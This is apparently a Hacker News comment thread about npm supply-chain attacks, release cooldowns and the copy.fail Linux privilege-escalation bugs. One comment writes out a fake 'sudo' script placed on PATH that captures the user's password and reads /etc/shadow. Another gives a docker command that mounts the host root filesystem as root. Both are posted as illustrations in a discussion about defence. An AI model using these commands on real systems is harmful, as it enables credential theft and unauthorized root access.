That usually ends up as proxies to the upstream repos, because the people managing the company repos don't have time to review every new version of a package.
At that point you're just as vulnerable to a supply chain attack.
b112
So you get security updates late too? Many vulnerabilities are in the wild for years before being noticed, and patched.
Once noticed, that's where the exploit explosion erupts, excited exploiters everywhere, emboldened... enticed... excessively encouraged, by your delayed updates.
AgentME
Presumably npm exempts security updates from its minimum release age, but even if it doesn't, I think the times where you need an important security update are relatively rare enough that handling the real cases on a case-by-case basis with whitelisting is fine. Outside of Next.js's React2Shell vulnerability last year, I'm not sure I've ever had a security update of a dependency written in a memory-safe language (ie. not C/C++) which I've installed through npm/PyPI/Cargo that patched a security vulnerability that had been making my application exploitable to others in practice. Almost all security vulnerabilities I've personally seen flagged through npm are about things I only use at build-time and are only relevant if a user can create and pass an arbitrary object to the function, which is rarely the case. Most security vulnerabilities I've encountered and fixed in working on web apps were things like XSS, SQL injections, and improperly enforced permissions, and they nearly always happened in the application's own code rather than inside a dependency.
wavemode
> exempts security updates from its minimum release age
If it does, doesn't that defeat the purpose? If a package is compromised, of course the compromiser will just label their new version as a "security update".
mattstir
> Presumably npm exempts security updates from its minimum release age
Why would it? Then an attacker would just push compromised code as a "security update". Since the majority of these npm attacks are account-based, the attacker can do everything the actual owner could.
ayuhito
At least with our Renovate config, all dependencies have a 7 day cooldown, but marked security updates are immediate.
Attackers can’t push a security update without going through the reporting process (e.g. Github CVE), so they can’t necessarily abuse that easily.
ketozhang
You could still have security bumps happening (like dependabot).
skydhash
IMO, the most sustainable version is either the linux distros/bsd ports/homebrew models. You don't push new libraries to the public registry, instead you write a packaging script that gets reviewed for every new changes.
Another model is Perl's CPAN where you publish source files only.
microtonal
Trust me, as someone who has contributed to such a package set, almost nobody is inspecting diffs between upstream versions when updating a package. Only the package definitions themselves are reviewed, but they are typically only version + hash bumps.
Reviewing upstream diffs for every package requires a lot of man hours and most packagers are volunteers. I guess LLMs might help catching some obvious cases.
skydhash
Not really talking about upstream. Most supply attacks I’ve heard about are stolen secrets and artifacts uploading. They’re not about repositories or websites being taken over. As the packaging scripts are often in repos, you detect easily if people are trying to update where upstream points to.
XCabbage
Sorry, I don't get it. What's the chain of reasoning that connects "there are a couple of new Linux local privilege escalation exploits" to "don't install any new software"? Is the threat we're supposed to be concerned about here just a package maintainer publishing malware that uses these exploits?
(Naively, not knowing much about apt-get or yum or other OS package managers, I have always assumed that 1. only a handful of trusted people can publish to the default repos for system package managers and 2. that since I have to run `apt-get install` as root anyway, package installers can completely pwn my system if they want to and I am protected purely by trust. Is some of that wrong? If it's right, isn't it nonsensical to be any more worried about installing new packages in light of these vulns?)
roskilli
Well one thing is, there are package updates that could masquerade a backdoor much like XZ Utils[1].
The post in question points to dependency package managers however not system packages, such as NPM, which has pre and post build scripts, install scripts, etc.
ekjhgkejhgk
[flagged]
john_strinlai
for unknown-to-me reasons, the overlap between furries and some of the smartest security people in the world is way more than you would think
and even if it wasnt, this is about as sensible as not taking advice from left-handed people (i.e. completely nonsensical).
yreg
You should in regards to computer security.
anymouse123456
For the newer players who have gotten into continuous integration and containerized builds, consider checking on your systems to be sure you're not pulling 'latest' across a bunch of packages with every build.
We set up our base containers with all the external dependencies already in them and then only update those explicitly when we decide it's time.
This means we might be a bit behind the bleeding edge, but we're also taking on a lot less risk with random supply chain vulns getting instant global distribution.
anymouse123456
You'll also find your CI build times and flakey failures can be cut down massively by doing this.
Melatonic
Sounds like a good time to setup a test environment that does pull latest!
pjmlp
Additionally, use only internal repos.
mastermage
I think what we have to start accepting even security experts is that our world is incredibly fragile. I think people realy understimate this. And I do not mean just the IT world but the entire world is built on many incredibly fragile balances. Security Exploits will always exist. Not just in software but in real life. Heck someone managed to Sneak into a Security Conference. And that guy was a random youtuber. Granted that was not like a high security thing. But thats just an example I had of the top of my head. Basically it is realy easy to circumvent security in most cases.
What I want to say with that is fundamentally our world works because atleast most people do not abuse shit. That is fundamentally how human society has always worked, and will likely continue to do so.
kaelyx
I remember there was a trend with some UK Influencers using some "Ladder and a High-vis" tricks to enter places for a while to show how rough physical security is [0]. I believe its the youtuber, Max Fosh, who managed to do it back to back at the International Security Expo, first in the UK [1] and then in the US [2], with the fake names 'Rob Banks' and 'Nick Everything'.
I've studied security culture before and in most cases everything comes down to a sliding scale with security on one side and convenience/accessibility on the other, the more secure something is, the less accessible it is and vice versa.
[0] https://www.youtube.com/watch?v=LTI0SeyhAPA
sergeykish
Linux distributions do not need Copy Fail to get root access:
echo 'export PATH="$HOME/.local/bin:$PATH"' >> ~/.bashrc
mkdir -p .local/bin/
cat <<EOF >.local/bin/sudo
read -rs -p "[sudo] password for $USER: " PASSWORD
echo ""
echo "$PASSWORD" | /usr/bin/sudo -S head /etc/shadow
EOF
chmod +x .local/bin/sudo
attack on next sudo call, shows data accessible only to root.Our security model based on distributions verifying packages, that is distro maintainers. Software we can't trust should be running in VMs. Attack on trivy is just the beginning and solution is removing pip, uv, npm, rbenv from host, running in docker containers:
$ docker run -it -v.:/app -w /app node:alpine /bin/sh
long term environments defined in docker compose: $ docker-compose.yml
services:
app:
image: node:alpine
volumes:
- .:/app
working_dir: /app
command: /bin/sh
$ docker compose run app
switch to Kata etc if more protection needed. Eventually all userspace would run in VMs.kro
These copyfail exploits allow an unprivileged (daemon/app) user (not in sudoers) to get root without interaction from the original system maintainer.
It's quite different from PATH-injecting an already privileged user.
Also, these memory corruptions can likely be used as container escape primitives too. Albeit not easily.
It's a serious break of a security boundary. Yes, container layer adds defense, and normal unix security isn't perfect, but it should not allow this.
sergeykish
Copy Fail can't affect files it can't access.
PoC attack on k8s [1] claims execution through sibling layers of kube-proxy, host filesystem access through /dev/ [2].
[1] https://github.com/Percivalll/Copy-Fail-CVE-2026-31431-Kuber...
[2] https://github.com/Percivalll/Copy-Fail-CVE-2026-31431-Kuber...
quectophoton
If `docker` is already there, why even bother with `sudo` when you can just:
docker run --rm -it -v '/:/mnt' -u 'root' 'alpine' '/bin/sh' '-l'
Chances are that the person who set up Docker didn't do it properly.sergeykish
Run in docker container:
$ docker run -it -v.:/app -w /app node:alpine /bin/sh
/app # docker run --rm -it -v '/:/mnt' -u 'root' 'alpine' '/bin/sh' '-l'
/bin/sh: docker: not found
I've described attack from host user and isolating attacker with docker.harrouet
Containerizing every app is what iOS / iPadOS already do.
It is regularly pointed out as a drawback by Android users (e.g. "I can't run that doomscrolling blocker in iOS"), but from a security-model perspective it was visionary back in 2008.
andai
Can someone help me understand the copyfail thing and how it relates to NPM packages?
Edit: I think I understand. copyfail is a kernel bug that lets a malicious npm package get root access on your Linux server, right?
So now, while there are unpatched servers, is when it would be the perfect time for attackers to target NPM packages.
And the advice isn't just "update your kernel" because we are still finding new related issues?
ahpeeyem
NPM supply-chain attacks spread really quickly.
If a popular NPM package was compromised and included a copy.fail exploit, it would make lots of systems vulnerable to root privilege escalation.
Gigachad
The patches for the latest vulnerabilities aren’t even out yet. So it would be a real bad time for a new supply chain attack since it would get root on pretty much every system.
wavemode
> And the advice isn't just "update your kernel" because we are still finding new related issues?
The advice isn't just "update your kernel" because there is no update. The latest vulnerability (the one discovered after copy.fail) still has no fix.
xena
npm can run on linux.
abustamam
This advice is good even if there weren't security vulnerabilities. When I was a junior engineer I'd install a bunch of packages just willy nilly. My manager was like "stop installing packages for simple things. Just learn how they work and code it yourself."
I've done that ever since. Of course, I still use packages like express and tailwindcss. But in the era of LLMs, using a package for something like react drop-downs is unnecessary.
Animats
I'm holding off on upgrading to Ubuntu 26.04 LTS until we have a few months of experience with the new release. Canonical just had a huge DDOS attack, and there might have been other attacks hidden in all that traffic.
turpentine
There are at least two recent negative signals.
https://news.ycombinator.com/item?id=47943499 - 44 CVEs trying to replace coreutils with a greenfield rust rewrite.
https://news.ycombinator.com/item?id=47921079 - Shoehorning AI stuff into Ubuntu is the future.
Get the top HN stories in your inbox every day.
This was always a nightmare waiting to happen. The sheer mass of packages and the consequent vast attack surface for supply chain attacks was always a problem that was eventually going to blow up in everyone's face.
But it was too convenient. Anyone warning about it or trying to limit the damage was shouted down by people who had no experience of any other way of doing things. "import antigravity" is just too easy to do without.
Well, now we're reaching the "find out" part of the process I guess.